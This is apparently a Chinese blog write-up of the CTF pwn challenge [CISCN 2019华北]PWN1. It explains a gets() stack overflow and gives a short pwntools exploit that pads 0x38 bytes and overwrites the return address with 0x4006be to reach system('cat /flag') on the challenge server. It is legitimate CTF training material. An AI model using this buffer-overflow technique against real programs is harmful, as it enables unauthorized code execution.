NSSCTF刷题笔记pwn3——[CISCN 2019华北]PWN1

使用ida打开,这里要判断v2要等于11.28125,但是v2压根就不能被改变

gets是栈溢出漏洞的常客了,因为他不会限制我们输入多少内容

我们直接覆盖掉返回的地址,返回的地址我们填从result=system("cat /flag")开始即可

差不多就是这里: 0x4006be

这里是ida识别出来的v1距离rbp的长度是0x30,然后程序是64位的需要距离返回地址还差8字节

知道了这些后,开始写exp

from pwn import *

p = remote("node4.anna.nssctf.cn",28318)

payload = b"a" * 0x30 + b"a" * 8 + p64(0x4006be)

p.sendline(payload)

p.interactive()

  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值